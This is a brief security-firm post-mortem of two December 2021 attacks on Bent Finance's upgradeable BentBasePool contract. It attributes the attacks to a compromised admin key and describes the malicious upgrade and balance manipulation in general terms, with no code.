Fairyproof’s Brief Analysis of Attack on Bent Finance
Bent Finance, a staking and farming platform to enhance users’ curve returns was exploited twice within ten days.
Bent Finance, a staking and farming platform to enhance users’ curve returns was exploited twice within ten days.
In these two attacks, the attacker exploited 263,000 cvxCRV tokens in the first attack and 250,000 cvxCRV tokens in the second attack. The value of the totally exploited LP tokens was around 3 million USDs.
The first exploitation happened at 08:38:53 PM on Dec-12–2021 +UTC and the transaction can be checked at:
https://etherscan.io/tx/0x0b2ce2f3822e09ca280d22e969d41b08e0df3ccfc75db08287e0e0c091dd6d50 .
The second happened at 02:43:53 AM on Dec-21–2021 +UTC and the transaction can be checked at:
https://etherscan.io/tx/0x4010b3b64336dc0a340a69010008f7b3fa3842466b2641a6961d888a771f5468.
The attacked contract was the BentBasePool contract deployed at 0x270B6AFF561284ef380cDD6d8B036f4981049A86 on Ethereum. This contract allowed its implementation contract to be upgraded. After a contract upgrade was to happen, an “updateVersion” function would be called to finish the upgrade.
The root cause of this attack is the admin’s private key was compromised.
The whole process:
The attacker exploited the admin’s private key to update the application with his/her malicious contract and update the balance of his/her address by calling the malicious contract’s updateVersion function.
Then the attacker updated the implementation contract again with a normal contract and called the updateVersion to finish the upgrade.